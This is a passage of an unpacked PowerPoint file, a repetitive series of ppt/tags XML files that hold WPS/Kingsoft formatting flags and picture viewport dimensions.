  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1018.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1019.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag102.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1020.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1021.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1022.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1023.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1024.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1025.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1026.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1027.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1028.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1029.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag103.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1030.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1031.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1032.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1033.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1034.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1035.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1036.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1037.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1038.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1039.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag104.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1040.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1041.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1042.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1043.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1044.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1045.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1046.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1047.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1048.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1049.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag105.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1050.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1051.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1052.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1053.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1054.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1055.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1056.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1057.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1058.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1059.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag106.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1060.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1061.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1062.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1063.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1064.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1065.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1066.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1067.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1068.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1069.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag107.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1070.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1071.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1072.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1073.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1074.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1075.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1076.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1077.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1078.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1079.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag108.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1080.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1081.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1082.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1083.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1084.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1085.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1086.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1087.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1088.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1089.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag109.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1090.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1091.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1092.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1093.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1094.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1095.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1096.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1097.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1098.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1099.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag110.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1100.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1101.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1102.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1103.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1104.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1105.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1106.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1107.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1108.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1109.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag111.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1110.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1111.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1112.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1113.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1114.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1115.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1116.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1117.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1118.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1119.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag112.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1120.xml><?xml version="1.0" encoding="utf-8"?>
